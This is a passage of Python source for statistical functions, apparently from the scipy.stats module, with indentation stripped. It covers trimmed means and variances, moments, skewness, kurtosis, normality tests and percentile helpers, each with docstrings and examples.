nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan. 'propagate' returns nan,
'raise' throws an error, 'omit' performs the calculations ignoring nan
values. Default is 'propagate'.
Returns
-------
mode : ndarray
Array of modal values.
count : ndarray
Array of counts for each mode.
Examples
--------
>>> a = np.array([[6, 8, 3, 0],
... [3, 2, 1, 7],
... [8, 1, 8, 4],
... [5, 3, 0, 5],
... [4, 7, 5, 9]])
>>> from scipy import stats
>>> stats.mode(a)
(array([[3, 1, 0, 0]]), array([[1, 1, 1, 1]]))
To get mode of whole array, specify ``axis=None``:
>>> stats.mode(a, axis=None)
(array([3]), array([3]))
"""
a, axis = _chk_asarray(a, axis)
if a.size == 0:
return np.array([]), np.array([])
contains_nan, nan_policy = _contains_nan(a, nan_policy)
ModeResult = namedtuple('ModeResult', ('mode', 'count'))
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.mode(a, axis)
scores = np.unique(np.ravel(a)) # get ALL unique values
testshape = list(a.shape)
testshape[axis] = 1
oldmostfreq = np.zeros(testshape, dtype=a.dtype)
oldcounts = np.zeros(testshape, dtype=int)
for score in scores:
template = (a == score)
counts = np.expand_dims(np.sum(template, axis), axis)
mostfrequent = np.where(counts > oldcounts, score, oldmostfreq)
oldcounts = np.maximum(counts, oldcounts)
oldmostfreq = mostfrequent
ModeResult = namedtuple('ModeResult', ('mode', 'count'))
return ModeResult(mostfrequent, oldcounts)
def _mask_to_limits(a, limits, inclusive):
"""Mask an array for values outside of given limits.
This is primarily a utility function.
Parameters
----------
a : array
limits : (float or None, float or None)
A tuple consisting of the (lower limit, upper limit). Values in the
input array less than the lower limit or greater than the upper limit
will be masked out. None implies no limit.
inclusive : (bool, bool)
A tuple consisting of the (lower flag, upper flag). These flags
determine whether values exactly equal to lower or upper are allowed.
Returns
-------
A MaskedArray.
Raises
------
A ValueError if there are no values within the given limits.
"""
lower_limit, upper_limit = limits
lower_include, upper_include = inclusive
am = ma.MaskedArray(a)
if lower_limit is not None:
if lower_include:
am = ma.masked_less(am, lower_limit)
else:
am = ma.masked_less_equal(am, lower_limit)
if upper_limit is not None:
if upper_include:
am = ma.masked_greater(am, upper_limit)
else:
am = ma.masked_greater_equal(am, upper_limit)
if am.count() == 0:
raise ValueError("No array values within given limits")
return am
def tmean(a, limits=None, inclusive=(True, True), axis=None):
"""
Compute the trimmed mean.
This function finds the arithmetic mean of given values, ignoring values
outside the given `limits`.
Parameters
----------
a : array_like
Array of values.
limits : None or (lower limit, upper limit), optional
Values in the input array less than the lower limit or greater than the
upper limit will be ignored. When limits is None (default), then all
values are used. Either of the limit values in the tuple can also be
None representing a half-open interval.
inclusive : (bool, bool), optional
A tuple consisting of the (lower flag, upper flag). These flags
determine whether values exactly equal to the lower or upper limits
are included. The default value is (True, True).
axis : int or None, optional
Axis along which to compute test. Default is None.
Returns
-------
tmean : float
See also
--------
trim_mean : returns mean after trimming a proportion from both tails.
Examples
--------
>>> from scipy import stats
>>> x = np.arange(20)
>>> stats.tmean(x)
9.5
>>> stats.tmean(x, (3,17))
10.0
"""
a = asarray(a)
if limits is None:
return np.mean(a, None)
am = _mask_to_limits(a.ravel(), limits, inclusive)
return am.mean(axis=axis)
def tvar(a, limits=None, inclusive=(True, True), axis=0, ddof=1):
"""
Compute the trimmed variance
This function computes the sample variance of an array of values,
while ignoring values which are outside of given `limits`.
Parameters
----------
a : array_like
Array of values.
limits : None or (lower limit, upper limit), optional
Values in the input array less than the lower limit or greater than the
upper limit will be ignored. When limits is None, then all values are
used. Either of the limit values in the tuple can also be None
representing a half-open interval. The default value is None.
inclusive : (bool, bool), optional
A tuple consisting of the (lower flag, upper flag). These flags
determine whether values exactly equal to the lower or upper limits
are included. The default value is (True, True).
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over the
whole array `a`.
ddof : int, optional
Delta degrees of freedom. Default is 1.
Returns
-------
tvar : float
Trimmed variance.
Notes
-----
`tvar` computes the unbiased sample variance, i.e. it uses a correction
factor ``n / (n - 1)``.
Examples
--------
>>> from scipy import stats
>>> x = np.arange(20)
>>> stats.tvar(x)
35.0
>>> stats.tvar(x, (3,17))
20.0
"""
a = asarray(a)
a = a.astype(float).ravel()
if limits is None:
n = len(a)
return a.var() * n/(n-1.)
am = _mask_to_limits(a, limits, inclusive)
return np.ma.var(am, ddof=ddof, axis=axis)
def tmin(a, lowerlimit=None, axis=0, inclusive=True, nan_policy='propagate'):
"""
Compute the trimmed minimum
This function finds the miminum value of an array `a` along the
specified axis, but only considering values greater than a specified
lower limit.
Parameters
----------
a : array_like
array of values
lowerlimit : None or float, optional
Values in the input array less than the given limit will be ignored.
When lowerlimit is None, then all values are used. The default value
is None.
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over the
whole array `a`.
inclusive : {True, False}, optional
This flag determines whether values exactly equal to the lower limit
are included. The default value is True.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan. 'propagate' returns nan,
'raise' throws an error, 'omit' performs the calculations ignoring nan
values. Default is 'propagate'.
Returns
-------
tmin : float, int or ndarray
Examples
--------
>>> from scipy import stats
>>> x = np.arange(20)
>>> stats.tmin(x)
0
>>> stats.tmin(x, 13)
13
>>> stats.tmin(x, 13, inclusive=False)
14
"""
a, axis = _chk_asarray(a, axis)
am = _mask_to_limits(a, (lowerlimit, None), (inclusive, False))
contains_nan, nan_policy = _contains_nan(am, nan_policy)
if contains_nan and nan_policy == 'omit':
am = ma.masked_invalid(am)
res = ma.minimum.reduce(am, axis).data
if res.ndim == 0:
return res[()]
return res
def tmax(a, upperlimit=None, axis=0, inclusive=True, nan_policy='propagate'):
"""
Compute the trimmed maximum
This function computes the maximum value of an array along a given axis,
while ignoring values larger than a specified upper limit.
Parameters
----------
a : array_like
array of values
upperlimit : None or float, optional
Values in the input array greater than the given limit will be ignored.
When upperlimit is None, then all values are used. The default value
is None.
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over the
whole array `a`.
inclusive : {True, False}, optional
This flag determines whether values exactly equal to the upper limit
are included. The default value is True.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan. 'propagate' returns nan,
'raise' throws an error, 'omit' performs the calculations ignoring nan
values. Default is 'propagate'.
Returns
-------
tmax : float, int or ndarray
Examples
--------
>>> from scipy import stats
>>> x = np.arange(20)
>>> stats.tmax(x)
19
>>> stats.tmax(x, 13)
13
>>> stats.tmax(x, 13, inclusive=False)
12
"""
a, axis = _chk_asarray(a, axis)
am = _mask_to_limits(a, (None, upperlimit), (False, inclusive))
contains_nan, nan_policy = _contains_nan(am, nan_policy)
if contains_nan and nan_policy == 'omit':
am = ma.masked_invalid(am)
res = ma.maximum.reduce(am, axis).data
if res.ndim == 0:
return res[()]
return res
def tstd(a, limits=None, inclusive=(True, True), axis=0, ddof=1):
"""
Compute the trimmed sample standard deviation
This function finds the sample standard deviation of given values,
ignoring values outside the given `limits`.
Parameters
----------
a : array_like
array of values
limits : None or (lower limit, upper limit), optional
Values in the input array less than the lower limit or greater than the
upper limit will be ignored. When limits is None, then all values are
used. Either of the limit values in the tuple can also be None
representing a half-open interval. The default value is None.
inclusive : (bool, bool), optional
A tuple consisting of the (lower flag, upper flag). These flags
determine whether values exactly equal to the lower or upper limits
are included. The default value is (True, True).
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over the
whole array `a`.
ddof : int, optional
Delta degrees of freedom. Default is 1.
Returns
-------
tstd : float
Notes
-----
`tstd` computes the unbiased sample standard deviation, i.e. it uses a
correction factor ``n / (n - 1)``.
Examples
--------
>>> from scipy import stats
>>> x = np.arange(20)
>>> stats.tstd(x)
5.9160797830996161
>>> stats.tstd(x, (3,17))
4.4721359549995796
"""
return np.sqrt(tvar(a, limits, inclusive, axis, ddof))
def tsem(a, limits=None, inclusive=(True, True), axis=0, ddof=1):
"""
Compute the trimmed standard error of the mean.
This function finds the standard error of the mean for given
values, ignoring values outside the given `limits`.
Parameters
----------
a : array_like
array of values
limits : None or (lower limit, upper limit), optional
Values in the input array less than the lower limit or greater than the
upper limit will be ignored. When limits is None, then all values are
used. Either of the limit values in the tuple can also be None
representing a half-open interval. The default value is None.
inclusive : (bool, bool), optional
A tuple consisting of the (lower flag, upper flag). These flags
determine whether values exactly equal to the lower or upper limits
are included. The default value is (True, True).
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over the
whole array `a`.
ddof : int, optional
Delta degrees of freedom. Default is 1.
Returns
-------
tsem : float
Notes
-----
`tsem` uses unbiased sample standard deviation, i.e. it uses a
correction factor ``n / (n - 1)``.
Examples
--------
>>> from scipy import stats
>>> x = np.arange(20)
>>> stats.tsem(x)
1.3228756555322954
>>> stats.tsem(x, (3,17))
1.1547005383792515
"""
a = np.asarray(a).ravel()
if limits is None:
return a.std(ddof=ddof) / np.sqrt(a.size)
am = _mask_to_limits(a, limits, inclusive)
sd = np.sqrt(np.ma.var(am, ddof=ddof, axis=axis))
return sd / np.sqrt(am.count())
#####################################
# MOMENTS #
#####################################
def moment(a, moment=1, axis=0, nan_policy='propagate'):
"""
Calculates the nth moment about the mean for a sample.
A moment is a specific quantitative measure of the shape of a set of points.
It is often used to calculate coefficients of skewness and kurtosis due
to its close relationship with them.
Parameters
----------
a : array_like
data
moment : int or array_like of ints, optional
order of central moment that is returned. Default is 1.
axis : int or None, optional
Axis along which the central moment is computed. Default is 0.
If None, compute over the whole array `a`.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan. 'propagate' returns nan,
'raise' throws an error, 'omit' performs the calculations ignoring nan
values. Default is 'propagate'.
Returns
-------
n-th central moment : ndarray or float
The appropriate moment along the given axis or over all values if axis
is None. The denominator for the moment calculation is the number of
observations, no degrees of freedom correction is done.
See also
--------
kurtosis, skew, describe
Notes
-----
The k-th central moment of a data sample is:
.. math::
m_k = \frac{1}{n} \sum_{i = 1}^n (x_i - \bar{x})^k
Where n is the number of samples and x-bar is the mean. This function uses
exponentiation by squares [1]_ for efficiency.
References
----------
.. [1] http://eli.thegreenplace.net/2009/03/21/efficient-integer-exponentiation-algorithms
"""
a, axis = _chk_asarray(a, axis)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.moment(a, moment, axis)
if contains_nan and nan_policy == 'propagate':
return np.nan
if a.size == 0:
# empty array, return nan(s) with shape matching `moment`
if np.isscalar(moment):
return np.nan
else:
return np.ones(np.asarray(moment).shape, dtype=np.float64) * np.nan
# for array_like moment input, return a value for each.
if not np.isscalar(moment):
mmnt = [_moment(a, i, axis) for i in moment]
return np.array(mmnt)
else:
return _moment(a, moment, axis)
def _moment(a, moment, axis):
if np.abs(moment - np.round(moment)) > 0:
raise ValueError("All moment parameters must be integers")
if moment == 0:
# When moment equals 0, the result is 1, by definition.
shape = list(a.shape)
del shape[axis]
if shape:
# return an actual array of the appropriate shape
return np.ones(shape, dtype=float)
else:
# the input was 1D, so return a scalar instead of a rank-0 array
return 1.0
elif moment == 1:
# By definition the first moment about the mean is 0.
shape = list(a.shape)
del shape[axis]
if shape:
# return an actual array of the appropriate shape
return np.zeros(shape, dtype=float)
else:
# the input was 1D, so return a scalar instead of a rank-0 array
return np.float64(0.0)
else:
# Exponentiation by squares: form exponent sequence
n_list = [moment]
current_n = moment
while current_n > 2:
if current_n % 2:
current_n = (current_n-1)/2
else:
current_n /= 2
n_list.append(current_n)
# Starting point for exponentiation by squares
a_zero_mean = a - np.expand_dims(np.mean(a, axis), axis)
if n_list[-1] == 1:
s = a_zero_mean.copy()
else:
s = a_zero_mean**2
# Perform multiplications
for n in n_list[-2::-1]:
s = s**2
if n % 2:
s *= a_zero_mean
return np.mean(s, axis)
def variation(a, axis=0, nan_policy='propagate'):
"""
Computes the coefficient of variation, the ratio of the biased standard
deviation to the mean.
Parameters
----------
a : array_like
Input array.
axis : int or None, optional
Axis along which to calculate the coefficient of variation. Default
is 0. If None, compute over the whole array `a`.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan. 'propagate' returns nan,
'raise' throws an error, 'omit' performs the calculations ignoring nan
values. Default is 'propagate'.
Returns
-------
variation : ndarray
The calculated variation along the requested axis.
References
----------
.. [1] Zwillinger, D. and Kokoska, S. (2000). CRC Standard
Probability and Statistics Tables and Formulae. Chapman & Hall: New
York. 2000.
"""
a, axis = _chk_asarray(a, axis)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.variation(a, axis)
if contains_nan and nan_policy == 'propagate':
return np.nan
return a.std(axis) / a.mean(axis)
def skew(a, axis=0, bias=True, nan_policy='propagate'):
"""
Computes the skewness of a data set.
For normally distributed data, the skewness should be about 0. A skewness
value > 0 means that there is more weight in the left tail of the
distribution. The function `skewtest` can be used to determine if the
skewness value is close enough to 0, statistically speaking.
Parameters
----------
a : ndarray
data
axis : int or None, optional
Axis along which skewness is calculated. Default is 0.
If None, compute over the whole array `a`.
bias : bool, optional
If False, then the calculations are corrected for statistical bias.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan. 'propagate' returns nan,
'raise' throws an error, 'omit' performs the calculations ignoring nan
values. Default is 'propagate'.
Returns
-------
skewness : ndarray
The skewness of values along an axis, returning 0 where all values are
equal.
References
----------
.. [1] Zwillinger, D. and Kokoska, S. (2000). CRC Standard
Probability and Statistics Tables and Formulae. Chapman & Hall: New
York. 2000.
Section 2.2.24.1
"""
a, axis = _chk_asarray(a, axis)
n = a.shape[axis]
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.skew(a, axis, bias)
if contains_nan and nan_policy == 'propagate':
return np.nan
m2 = moment(a, 2, axis)
m3 = moment(a, 3, axis)
zero = (m2 == 0)
vals = _lazywhere(~zero, (m2, m3),
lambda m2, m3: m3 / m2**1.5,
0.)
if not bias:
can_correct = (n > 2) & (m2 > 0)
if can_correct.any():
m2 = np.extract(can_correct, m2)
m3 = np.extract(can_correct, m3)
nval = np.sqrt((n-1.0)*n) / (n-2.0) * m3/m2**1.5
np.place(vals, can_correct, nval)
if vals.ndim == 0:
return vals.item()
return vals
def kurtosis(a, axis=0, fisher=True, bias=True, nan_policy='propagate'):
"""
Computes the kurtosis (Fisher or Pearson) of a dataset.
Kurtosis is the fourth central moment divided by the square of the
variance. If Fisher's definition is used, then 3.0 is subtracted from
the result to give 0.0 for a normal distribution.
If bias is False then the kurtosis is calculated using k statistics to
eliminate bias coming from biased moment estimators
Use `kurtosistest` to see if result is close enough to normal.
Parameters
----------
a : array
data for which the kurtosis is calculated
axis : int or None, optional
Axis along which the kurtosis is calculated. Default is 0.
If None, compute over the whole array `a`.
fisher : bool, optional
If True, Fisher's definition is used (normal ==> 0.0). If False,
Pearson's definition is used (normal ==> 3.0).
bias : bool, optional
If False, then the calculations are corrected for statistical bias.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan. 'propagate' returns nan,
'raise' throws an error, 'omit' performs the calculations ignoring nan
values. Default is 'propagate'.
Returns
-------
kurtosis : array
The kurtosis of values along an axis. If all values are equal,
return -3 for Fisher's definition and 0 for Pearson's definition.
References
----------
.. [1] Zwillinger, D. and Kokoska, S. (2000). CRC Standard
Probability and Statistics Tables and Formulae. Chapman & Hall: New
York. 2000.
"""
a, axis = _chk_asarray(a, axis)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.kurtosis(a, axis, fisher, bias)
if contains_nan and nan_policy == 'propagate':
return np.nan
n = a.shape[axis]
m2 = moment(a, 2, axis)
m4 = moment(a, 4, axis)
zero = (m2 == 0)
olderr = np.seterr(all='ignore')
try:
vals = np.where(zero, 0, m4 / m2**2.0)
finally:
np.seterr(**olderr)
if not bias:
can_correct = (n > 3) & (m2 > 0)
if can_correct.any():
m2 = np.extract(can_correct, m2)
m4 = np.extract(can_correct, m4)
nval = 1.0/(n-2)/(n-3) * ((n**2-1.0)*m4/m2**2.0 - 3*(n-1)**2.0)
np.place(vals, can_correct, nval + 3.0)
if vals.ndim == 0:
vals = vals.item() # array scalar
if fisher:
return vals - 3
else:
return vals
def describe(a, axis=0, ddof=1, bias=True, nan_policy='propagate'):
"""
Computes several descriptive statistics of the passed array.
Parameters
----------
a : array_like
Input data.
axis : int or None, optional
Axis along which statistics are calculated. Default is 0.
If None, compute over the whole array `a`.
ddof : int, optional
Delta degrees of freedom (only for variance). Default is 1.
bias : bool, optional
If False, then the skewness and kurtosis calculations are corrected for
statistical bias.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan. 'propagate' returns nan,
'raise' throws an error, 'omit' performs the calculations ignoring nan
values. Default is 'propagate'.
Returns
-------
nobs : int
Number of observations (length of data along `axis`).
minmax: tuple of ndarrays or floats
Minimum and maximum value of data array.
mean : ndarray or float
Arithmetic mean of data along axis.
variance : ndarray or float
Unbiased variance of the data along axis, denominator is number of
observations minus one.
skewness : ndarray or float
Skewness, based on moment calculations with denominator equal to
the number of observations, i.e. no degrees of freedom correction.
kurtosis : ndarray or float
Kurtosis (Fisher). The kurtosis is normalized so that it is
zero for the normal distribution. No degrees of freedom are used.
See Also
--------
skew, kurtosis
Examples
--------
>>> from scipy import stats
>>> a = np.arange(10)
>>> stats.describe(a)
DescribeResult(nobs=10, minmax=(0, 9), mean=4.5, variance=9.1666666666666661,
skewness=0.0, kurtosis=-1.2242424242424244)
>>> b = [[1, 2], [3, 4]]
>>> stats.describe(b)
DescribeResult(nobs=2, minmax=(array([1, 2]), array([3, 4])),
mean=array([ 2., 3.]), variance=array([ 2., 2.]),
skewness=array([ 0., 0.]), kurtosis=array([-2., -2.]))
"""
a, axis = _chk_asarray(a, axis)
# Return namedtuple for clarity
DescribeResult = namedtuple('DescribeResult', ('nobs', 'minmax', 'mean',
'variance', 'skewness',
'kurtosis'))
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.describe(a, axis, ddof, bias)
if contains_nan and nan_policy == 'propagate':
res = np.zeros(6) * np.nan
return DescribeResult(*res)
if a.size == 0:
raise ValueError("The input must not be empty.")
n = a.shape[axis]
mm = (np.min(a, axis=axis), np.max(a, axis=axis))
m = np.mean(a, axis=axis)
v = np.var(a, axis=axis, ddof=ddof)
sk = skew(a, axis, bias=bias)
kurt = kurtosis(a, axis, bias=bias)
return DescribeResult(n, mm, m, v, sk, kurt)
#####################################
# NORMALITY TESTS #
#####################################
def skewtest(a, axis=0, nan_policy='propagate'):
"""
Tests whether the skew is different from the normal distribution.
This function tests the null hypothesis that the skewness of
the population that the sample was drawn from is the same
as that of a corresponding normal distribution.
Parameters
----------
a : array
The data to be tested
axis : int or None, optional
Axis along which statistics are calculated. Default is 0.
If None, compute over the whole array `a`.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan. 'propagate' returns nan,
'raise' throws an error, 'omit' performs the calculations ignoring nan
values. Default is 'propagate'.
Returns
-------
statistic : float
The computed z-score for this test.
pvalue : float
a 2-sided p-value for the hypothesis test
Notes
-----
The sample size must be at least 8.
"""
a, axis = _chk_asarray(a, axis)
SkewtestResult = namedtuple('SkewtestResult', ('statistic', 'pvalue'))
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.skewtest(a, axis)
if contains_nan and nan_policy == 'propagate':
return SkewtestResult(np.nan, np.nan)
if axis is None:
a = np.ravel(a)
axis = 0
b2 = skew(a, axis)
n = float(a.shape[axis])
if n < 8:
raise ValueError(
"skewtest is not valid with less than 8 samples; %i samples"
" were given." % int(n))
y = b2 * math.sqrt(((n + 1) * (n + 3)) / (6.0 * (n - 2)))
beta2 = (3.0 * (n**2 + 27*n - 70) * (n+1) * (n+3) /
((n-2.0) * (n+5) * (n+7) * (n+9)))
W2 = -1 + math.sqrt(2 * (beta2 - 1))
delta = 1 / math.sqrt(0.5 * math.log(W2))
alpha = math.sqrt(2.0 / (W2 - 1))
y = np.where(y == 0, 1, y)
Z = delta * np.log(y / alpha + np.sqrt((y / alpha)**2 + 1))
return SkewtestResult(Z, 2 * distributions.norm.sf(np.abs(Z)))
def kurtosistest(a, axis=0, nan_policy='propagate'):
"""
Tests whether a dataset has normal kurtosis
This function tests the null hypothesis that the kurtosis
of the population from which the sample was drawn is that
of the normal distribution: ``kurtosis = 3(n-1)/(n+1)``.
Parameters
----------
a : array
array of the sample data
axis : int or None, optional
Axis along which to compute test. Default is 0. If None,
compute over the whole array `a`.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan. 'propagate' returns nan,
'raise' throws an error, 'omit' performs the calculations ignoring nan
values. Default is 'propagate'.
Returns
-------
statistic : float
The computed z-score for this test.
pvalue : float
The 2-sided p-value for the hypothesis test
Notes
-----
Valid only for n>20. The Z-score is set to 0 for bad entries.
"""
a, axis = _chk_asarray(a, axis)
KurtosistestResult = namedtuple('KurtosistestResult', ('statistic',
'pvalue'))
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.kurtosistest(a, axis)
if contains_nan and nan_policy == 'propagate':
return KurtosistestResult(np.nan, np.nan)
n = float(a.shape[axis])
if n < 5:
raise ValueError(
"kurtosistest requires at least 5 observations; %i observations"
" were given." % int(n))
if n < 20:
warnings.warn("kurtosistest only valid for n>=20 ... continuing "
"anyway, n=%i" % int(n))
b2 = kurtosis(a, axis, fisher=False)
E = 3.0*(n-1) / (n+1)
varb2 = 24.0*n*(n-2)*(n-3) / ((n+1)*(n+1.)*(n+3)*(n+5))
x = (b2-E) / np.sqrt(varb2)
sqrtbeta1 = 6.0*(n*n-5*n+2)/((n+7)*(n+9)) * np.sqrt((6.0*(n+3)*(n+5)) /
(n*(n-2)*(n-3)))
A = 6.0 + 8.0/sqrtbeta1 * (2.0/sqrtbeta1 + np.sqrt(1+4.0/(sqrtbeta1**2)))
term1 = 1 - 2/(9.0*A)
denom = 1 + x*np.sqrt(2/(A-4.0))
denom = np.where(denom < 0, 99, denom)
term2 = np.where(denom < 0, term1, np.power((1-2.0/A)/denom, 1/3.0))
Z = (term1 - term2) / np.sqrt(2/(9.0*A))
Z = np.where(denom == 99, 0, Z)
if Z.ndim == 0:
Z = Z[()]
# zprob uses upper tail, so Z needs to be positive
return KurtosistestResult(Z, 2 * distributions.norm.sf(np.abs(Z)))
def normaltest(a, axis=0, nan_policy='propagate'):
"""
Tests whether a sample differs from a normal distribution.
This function tests the null hypothesis that a sample comes
from a normal distribution. It is based on D'Agostino and
Pearson's [1]_, [2]_ test that combines skew and kurtosis to
produce an omnibus test of normality.
Parameters
----------
a : array_like
The array containing the data to be tested.
axis : int or None, optional
Axis along which to compute test. Default is 0. If None,
compute over the whole array `a`.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan. 'propagate' returns nan,
'raise' throws an error, 'omit' performs the calculations ignoring nan
values. Default is 'propagate'.
Returns
-------
statistic : float or array
``s^2 + k^2``, where ``s`` is the z-score returned by `skewtest` and
``k`` is the z-score returned by `kurtosistest`.
pvalue : float or array
A 2-sided chi squared probability for the hypothesis test.
References
----------
.. [1] D'Agostino, R. B. (1971), "An omnibus test of normality for
moderate and large sample size," Biometrika, 58, 341-348
.. [2] D'Agostino, R. and Pearson, E. S. (1973), "Testing for
departures from normality," Biometrika, 60, 613-622
"""
a, axis = _chk_asarray(a, axis)
NormaltestResult = namedtuple('NormaltestResult', ('statistic', 'pvalue'))
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.normaltest(a, axis)
if contains_nan and nan_policy == 'propagate':
return NormaltestResult(np.nan, np.nan)
s, _ = skewtest(a, axis)
k, _ = kurtosistest(a, axis)
k2 = s*s + k*k
return NormaltestResult(k2, distributions.chi2.sf(k2, 2))
def jarque_bera(x):
"""
Perform the Jarque-Bera goodness of fit test on sample data.
The Jarque-Bera test tests whether the sample data has the skewness and
kurtosis matching a normal distribution.
Note that this test only works for a large enough number of data samples
(>2000) as the test statistic asymptotically has a Chi-squared distribution
with 2 degrees of freedom.
Parameters
----------
x : array_like
Observations of a random variable.
Returns
-------
jb_value : float
The test statistic.
p : float
The p-value for the hypothesis test.
References
----------
.. [1] Jarque, C. and Bera, A. (1980) "Efficient tests for normality,
homoscedasticity and serial independence of regression residuals",
6 Econometric Letters 255-259.
Examples
--------
>>> from scipy import stats
>>> np.random.seed(987654321)
>>> x = np.random.normal(0, 1, 100000)
>>> y = np.random.rayleigh(1, 100000)
>>> stats.jarque_bera(x)
(4.7165707989581342, 0.09458225503041906)
>>> stats.jarque_bera(y)
(6713.7098548143422, 0.0)
"""
x = np.asarray(x)
n = float(x.size)
if n == 0:
raise ValueError('At least one observation is required.')
mu = x.mean()
diffx = x - mu
skewness = (1 / n * np.sum(diffx**3)) / (1 / n * np.sum(diffx**2))**(3 / 2.)
kurtosis = (1 / n * np.sum(diffx**4)) / (1 / n * np.sum(diffx**2))**2
jb_value = n / 6 * (skewness**2 + (kurtosis - 3)**2 / 4)
p = 1 - distributions.chi2.cdf(jb_value, 2)
return jb_value, p
#####################################
# FREQUENCY FUNCTIONS #
#####################################
def itemfreq(a):
"""
Returns a 2-D array of item frequencies.
Parameters
----------
a : (N,) array_like
Input array.
Returns
-------
itemfreq : (K, 2) ndarray
A 2-D frequency table. Column 1 contains sorted, unique values from
`a`, column 2 contains their respective counts.
Examples
--------
>>> from scipy import stats
>>> a = np.array([1, 1, 5, 0, 1, 2, 2, 0, 1, 4])
>>> stats.itemfreq(a)
array([[ 0., 2.],
[ 1., 4.],
[ 2., 2.],
[ 4., 1.],
[ 5., 1.]])
>>> np.bincount(a)
array([2, 4, 2, 0, 1, 1])
>>> stats.itemfreq(a/10.)
array([[ 0. , 2. ],
[ 0.1, 4. ],
[ 0.2, 2. ],
[ 0.4, 1. ],
[ 0.5, 1. ]])
"""
items, inv = np.unique(a, return_inverse=True)
freq = np.bincount(inv)
return np.array([items, freq]).T
def scoreatpercentile(a, per, limit=(), interpolation_method='fraction',
axis=None):
"""
Calculate the score at a given percentile of the input sequence.
For example, the score at `per=50` is the median. If the desired quantile
lies between two data points, we interpolate between them, according to
the value of `interpolation`. If the parameter `limit` is provided, it
should be a tuple (lower, upper) of two values.
Parameters
----------
a : array_like
A 1-D array of values from which to extract score.
per : array_like
Percentile(s) at which to extract score. Values should be in range
[0,100].
limit : tuple, optional
Tuple of two scalars, the lower and upper limits within which to
compute the percentile. Values of `a` outside
this (closed) interval will be ignored.
interpolation_method : {'fraction', 'lower', 'higher'}, optional
This optional parameter specifies the interpolation method to use,
when the desired quantile lies between two data points `i` and `j`
- fraction: ``i + (j - i) * fraction`` where ``fraction`` is the
fractional part of the index surrounded by ``i`` and ``j``.
- lower: ``i``.
- higher: ``j``.
axis : int, optional
Axis along which the percentiles are computed. Default is None. If
None, compute over the whole array `a`.
Returns
-------
score : float or ndarray
Score at percentile(s).
See Also
--------
percentileofscore, numpy.percentile
Notes
-----
This function will become obsolete in the future.
For Numpy 1.9 and higher, `numpy.percentile` provides all the functionality
that `scoreatpercentile` provides. And it's significantly faster.
Therefore it's recommended to use `numpy.percentile` for users that have
numpy >= 1.9.
Examples
--------
>>> from scipy import stats
>>> a = np.arange(100)
>>> stats.scoreatpercentile(a, 50)
49.5
"""
# adapted from NumPy's percentile function. When we require numpy >= 1.8,
# the implementation of this function can be replaced by np.percentile.
a = np.asarray(a)
if a.size == 0:
# empty array, return nan(s) with shape matching `per`
if np.isscalar(per):
return np.nan
else:
return np.ones(np.asarray(per).shape, dtype=np.float64) * np.nan
if limit:
a = a[(limit[0] <= a) & (a <= limit[1])]
sorted = np.sort(a, axis=axis)
if axis is None:
axis = 0
return _compute_qth_percentile(sorted, per, interpolation_method, axis)
# handle sequence of per's without calling sort multiple times
def _compute_qth_percentile(sorted, per, interpolation_method, axis):
if not np.isscalar(per):
score = [_compute_qth_percentile(sorted, i, interpolation_method, axis)
for i in per]
return np.array(score)
if (per < 0) or (per > 100):
raise ValueError("percentile must be in the range [0, 100]")
indexer = [slice(None)] * sorted.ndim
idx = per / 100. * (sorted.shape[axis] - 1)
if int(idx) != idx:
# round fractional indices according to interpolation method
if interpolation_method == 'lower':
idx = int(np.floor(idx))
elif interpolation_method == 'higher':
idx = int(np.ceil(idx))
elif interpolation_method == 'fraction':
pass # keep idx as fraction and interpolate
else:
raise ValueError("interpolation_method can only be 'fraction', "
"'lower' or 'higher'")
i = int(idx)
if i == idx:
indexer[axis] = slice(i, i + 1)
weights = array(1)
sumval = 1.0
else:
indexer[axis] = slice(i, i + 2)
j = i + 1
weights = array([(j - idx), (idx - i)], float)
wshape = [1] * sorted.ndim
wshape[axis] = 2
weights.shape = wshape
sumval = weights.sum()
# Use np.add.reduce (== np.sum but a little faster) to coerce data type
return np.add.reduce(sorted[indexer] * weights, axis=axis) / sumval
def percentileofscore(a, score, kind='rank'):
"""
The percentile rank of a score relative to a list of scores.
A `percentileofscore` of, for example, 80% means that 80% of the
scores in `a` are below the given score. In the case of gaps or
ties, the exact definition depends on the optional keyword, `kind`.
Parameters
----------
a : array_like
Array of scores to which `score` is compared.
score : int or float
Score that is compared to the elements in `a`.
kind : {'rank', 'weak', 'strict', 'mean'}, optional
